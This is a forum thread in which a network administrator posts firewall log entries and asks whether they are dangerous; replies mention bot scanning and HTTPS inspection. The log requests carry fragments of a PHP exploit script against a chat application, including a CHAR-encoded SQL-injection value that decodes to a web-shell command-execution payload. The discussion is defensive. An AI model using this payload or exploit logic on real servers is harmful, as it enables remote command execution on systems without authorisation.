help reading SQL Injection log

[FreshPrince]

http://192.168.0.2:80/<?/chat/messagesL.php3
http://192.168.0.2:80/die;/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/error_reporting(0);/chat/messagesL.php3
http://192.168.0.2:80/ini_set('max_execution_time',0);/chat/messagesL.php3
http://192.168.0.2:80/ini_set('default_socket_timeout',5);/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/$result='';$exa='';$cont=0;/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/else/chat/messagesL.php3
http://192.168.0.2:80/else/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/$ock=fsockopen(gethostbyname($host),$port);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/$parts=explode(':',$proxy);/chat/messagesL.php3
http://192.168.0.2:80/$ock=fsockopen($parts[0],$parts[1]);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/fputs($ock,$packet);/chat/messagesL.php3
http://192.168.0.2:80/$html='';/chat/messagesL.php3
http://192.168.0.2:80/$html.=fgets($ock);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/$html='';/chat/messagesL.php3
http://192.168.0.2:80/$html.=fread($ock,1);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/fclose($ock);/chat/messagesL.php3
http://192.168.0.2:80/#debug/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$host=$argv[1];/chat/messagesL.php3
http://192.168.0.2:80/$path=$argv[2];/chat/messagesL.php3
http://192.168.0.2:80/$action=$argv[3];/chat/messagesL.php3
http://192.168.0.2:80/$cmd='';$port=80;$proxy='';/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$temp=$argv[$i][0].$argv[$i][1];/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/$port=str_replace('-p','',$argv[$i]);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/$proxy=str_replace('-P','',$argv[$i]);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$L='L=english';/chat/messagesL.php3
http://192.168.0.2:80/$U='';/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$T.='0,';//latin1/chat/messagesL.php3
http://192.168.0.2:80/$T.='9999999999,';//m_time/chat/messagesL.php3
http://192.168.0.2:80/$T.='1,';//address/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$T.='CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*';/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$T='T='.urlencode($T);/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/srand(make_seed());/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/sendpacketii($packet);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/sleep(2);/chat/messagesL.php3
http://192.168.0.2:80/sendpacketii($packet);/chat/messagesL.php3
http://192.168.0.2:80/?>/chat/messagesL.php3

I found these types of log entries all over my firewall this morning...

I'm concerned that once it hits https, I won't know what's coming in.

I tested a couple of those requests and they all error out. should I be concerned?

damn IPS vendor said they blocked it after the fact...typical.

 

[Atheus]

I found these types of log entries all over my firewall this morning...

Are they really directed at that local address? Because that would mean it's coming from inside your network... unless you're talking about the local logs on the server, and you're running NAT on a border router.

Anyway, looks like a virus or a bot of some kind scanning you, if you're all patched up you shouldn't have any problems.

 

[FreshPrince]

Originally posted by: Atheus

I found these types of log entries all over my firewall this morning...

Are they really directed at that local address? Because that would mean it's coming from inside your network... unless you're talking about the local logs on the server, and you're running NAT on a border router.

Anyway, looks like a virus or a bot of some kind scanning you, if you're all patched up you shouldn't have any problems.

external IP's, I just changed it to internal.

 

[RebateMonger]

There are ways to decrypt https and scan it for stuff like this. MS's ISA Server 2004, on a Windows Server, can do this. You accept encrypted traffic at your external IP, ISA decrypts it and examines it. Then, if you wish, ISA re-encrypts it and delivers it to your web server.

 

[FreshPrince]

Originally posted by: RebateMonger
There are ways to decrypt https and scan it for stuff like this. MS's ISA Server 2004, on a Windows Server, can do this. You accept encrypted traffic at your external IP, ISA decrypts it and examines it. Then, if you wish, ISA re-encrypts it and delivers it to your web server.

thx for the comment, but I already knew that.

any thoughts on the log above?